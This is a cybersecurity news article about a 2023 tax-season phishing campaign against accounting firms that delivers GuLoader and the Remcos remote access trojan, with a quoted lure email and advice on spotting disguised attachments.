• Mon. Jun 17th, 2024

Hackers Strike at Accounting Companies in Huge Numbers

Avatar photo

ByHarper Stewart

May 4, 2023
Hackers Strike at Accounting Companies in Huge Numbers
Harper Stewart
Latest posts by Harper Stewart (see all)

As the US tax season draws to a close, accountants are struggling to complete and file their clients’ tax returns on time.

Unfortunately, this has provided an opportunity for attackers to launch phishing campaigns aimed at infiltrating corporate networks and stealing sensitive information from taxpayers and financial companies.

Microsoft Threat Intelligence has issued a warning about a new phishing campaign that uses remote desktop malware to gain access to victims’ networks. The attackers send emails containing infected files, hoping that exhausted tax preparers and their clients will unwittingly download and open them.

The phishing emails often contain a message similar to:

“Our individual tax filings shouldn’t take up much of your time, so I apologize for not getting back to you sooner. I’m going to presume you want a copy of everything we’ve had for the last year. Password-protected cloud storage is used for all PDF documents.”

How does it happen?

Once the infected file is downloaded and activated, the malware starts PowerShell to obtain an encrypted VBS script from a remote host, saves it to C:WindowsTasks, and runs it. To avoid raising suspicion, the PDF bait is opened simultaneously through Microsoft Edge. Microsoft experts warn that the GuLoader malware is downloaded and installed on the host when VBS scripts are triggered using PowerShell. The Remcos remote access Trojan is then downloaded onto the compromised device.

How to protect yourself?

The hackers’ primary targets are businesses and individuals in the accounting, tax planning, and financial sectors. To protect yourself from this type of attack, it is important to always pay close attention to the files included in emails. Be cautious about opening attachments from unknown sources and always check the file size and extension to ensure they are legitimate. Enabling the display of hidden Windows files can help detect malicious shortcuts disguised as PDF files. Additionally, it’s recommended to enable the display of file extensions to ensure they are legitimate.

Avatar photo

Harper Stewart

With a deep understanding of the complexities of the Dark Web, Harper curates informative and thought-provoking content for our readers. Her knowledge of the hidden corners of the internet and cybersecurity helps shed light on the often mysterious and illicit activities that take place in this realm.